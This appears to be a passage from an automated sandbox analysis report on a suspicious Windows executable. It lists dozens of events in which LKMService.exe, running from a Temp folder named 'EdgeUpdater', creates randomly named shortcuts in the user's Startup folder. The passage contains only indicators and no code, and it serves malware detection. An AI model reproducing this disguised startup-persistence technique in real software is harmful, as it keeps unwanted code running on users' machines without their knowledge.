Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_385556207e4d49bb88bb33a72ac98a68.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7e8ecf4f001c41edb4100bd58d1d004f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9e92297ac52847c3a122730984e5abd1.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d5b565aee0b842f89c22c5f172678df9.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_aa8be52a868740eab8f8ec82641ac0c1.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f619a40d28e44231bbc0b75adc7e6593.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3a7884e208224a6c873f89801ccde078.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_70b4bf6c89434abb9c4a92d4a3107a31.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a37d9ccfb0194adf8213dc3f6997f78f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3334419e53b3488ca85ae4de076f47dc.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_621b8830c943464c9d47e42d99b46857.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a0df83e3640e4d8d8bc92cc51336f2f5.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1260347513fa42eb8dbca954b1f9766f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_30649bb19ccb493bae273224706f8bba.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7b11985b0f4a44efbcfa9ebcdda85610.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f259adaf5ff645509c195bf263dfd55e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c894375b99af48eb88116328de9ffb98.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_856eb967065a4a3faa5cc998ae92f005.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0f1fdcd72fa2443cb400c03502902fe9.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8127c9e300df4816a3f8c0b347934bf0.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e64ab677b62d4831a2902f3e6bff49df.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d97d239314814309aa82de22ff2626e0.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d9ae47459b854ee78156fea739ee2eba.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f398b917ebdf42d684e3df08d449596d.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d550e8040e9f44f19bffddc3e8e06d5e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_28a5b517ff724da4be16ea4aaf5a357c.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ed539e9b377a47aebbf43d3ea0cb839e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7d29b77eb5544048bf84a48c0bc966be.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a97a4cd7e177496cae1d18f2d60edeb6.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fff188210d924c868774a26b37b1f9c9.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_acbb346df900467ebd8c2c0ce13844f9.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2d07a0547ac04ab9af7372ee910ba6b1.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b87af243048a4cb58e7fbbcc09d4d0bb.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_687a9749c9a44df689e436ec246c5fcc.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_92fa881b504c497db058025dd6cb3bc4.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7172ee7a982744218b205a6832554ab3.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_17b0682e31094ae8b61542e0fc483319.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8f3c4b00bddc456e9c6e890ed0339b68.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_111bb590f9e24471b247ca4b4d7fd194.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c460e1bb0908400c8719e2ff6efc6472.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_255ec7c5f6124168899ab52eb1fb3db9.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ee6262db977148f9b6ce41041a0fbdf7.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_46234ffc04244b23ac4dc3e0979a0b7d.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_41851dcfce50420bb4154e63f25f2a8e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5f419d2562814795914a60f7e574128b.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ba60f2e1542943c49cb63fcb463703a8.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9dac438bfec04a60812adddf7761318f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f5a844d131a542409d15c7be5595addc.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e473bf015e6148daa821e9cdba096597.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_513aa6e3c652483682fd1f51e46a8bd3.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c365a14f7cc645439df5ba22b5f10906.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_38b12ffdc3054b75a4cc42355d27321a.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6bbe8cc63bcf4ed199794d58d51e869f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_88f655959b0548ed994a963bf2f1d4d9.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_80b58aa1ecd34f41b1ed729e00929f51.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_baaca187cd3746ad83aad8ceea07a8c5.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d827f342fe9c4f3d948a33ec240811fd.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2d708224935546eb848b785f0206ad51.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_270b1265d8e74892bac3d731d24190c0.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_59312c45173e49bd8b855b176d5a495f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_284cd24aa4e1493cb8422375a300e535.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_75bc3afdb6384591b03d648ecbb02287.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e4c3b32db63d4c3385d74139e1cfcce9.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9b99dd99249a49b197b20c73f033070f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5589ec67c0e2448ca25656e7e16c73e3.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_958c0b6e979e435bb4f60be1aee3dd03.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fc51083f46e44479828e6d9a79b9bb37.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a808b141de384ba28209e8f85ffef996.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_526295f827514b53bd18028cd35e87bd.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dd48efc11113448d9c44e8a8c157ad39.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_73b75d6015d7483b9bdcb14e44c1505c.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c6c8adfab8504d9095f55a114049f3d3.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7854577d09e6431c88169fff1770e32e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0792a7c0e50544d6a4b11823b693efec.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a91dde4ec0654d5faa715ea0cd5636bb.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3e7aec97c8bc4c58bc7e320cf8c9aed1.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ca5d77cba2b7460a9aed12793456440c.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5aba0e48cc6c41bfa9cec8d6d308f4e7.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f5ff322f4090403981ac575d9069d8a6.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f8222af956df4e9392ff70bf6cb8c75f.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cfdb367c887a433aa95af059e0afbe21.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_55d106e32ce949238a924c643bdcf373.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_26b5f12dcabf46c3b77f132db9dad925.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3db40f8d96c747958926b1eb567e5bd4.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_be81e1a44f8f4c5f9242ff357075b5d3.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a278fa9619bf4a8490c564cef196d074.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_02e8a991ef3544eabda639153e7216b6.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_952cc57250e64b97b914a2957a5939ed.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_713d13d93ba54ba4a2bee5c605c845a3.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9707391c32974477b52700f130ac1cb7.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_65b508a372044eed8b833fd4041f8819.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e223acbd469940358b359937201eb9b2.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d14ccb5487c8433d95506ecb32cb2690.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8aa4e48ffd54477592e44b825a1ff1b6.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6d603333c2b541768926d493700133a8.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_13feffee078442b98f35e9a38ad41756.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d9e42d35c8e343bdb56129036edf99d4.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_25338c699d96421aaf0a1ba93df7312c.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c36777343f8646bc9f8bb6efc22ef9b8.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_804cc7eb4d3c4c02a2c32d147219089a.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6231bf02d45e427bbb9b828041a02394.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_62cafd5f07ce4a59b8e60ed14dc1f8db.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_56db164c9f4845029d70161044c07596.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4cf4ef635c4442808a5c60a03abd63ad.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_878d667d16cd425ca300e21a7c362397.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d4b6a2fbd44d4fb2aa670d38ec1c4171.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b86cea4c7b9b4145a39b8715df791841.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_45ea511973cf478ba32bd0e0968190a7.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_38cb31f846c74a0983c4f6c57afbdef9.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e3c5548913e44c70a6c8fd8334fb936e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b47ea55076ae47399a1e118ab814c225.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c42d1852306b4504949cf6ca50578a33.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5c3891242d6e480991eaf7fb6a231975.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_366bac00d9ea42899c996b8ef7ae09ac.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ac7edd4c5ae54bc6b3380c57aecd027e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5ebe19dd30dc44edb6e3a49112c74b32.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_273b67199e3d4092b2105bd699526255.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5a4812cb23b84f2e95f65dd4fa039549.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_350e2bcd0734472ab3901d5d2bd51ce7.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2a0472589b8d49d580c1e14bce93ad8e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4519eb4cbc3c4d47bc3f7d639374071e.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9fb0273bb2b644a781d6c331178faddc.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a9acfe3ccaec43ec9fdb813dab7ecbc6.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_664fbf9e6e51431582fc5b1c0af457e3.lnkJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1256348d10fc4ee0a7d0b9467a5418cd.lnkJump to behavior
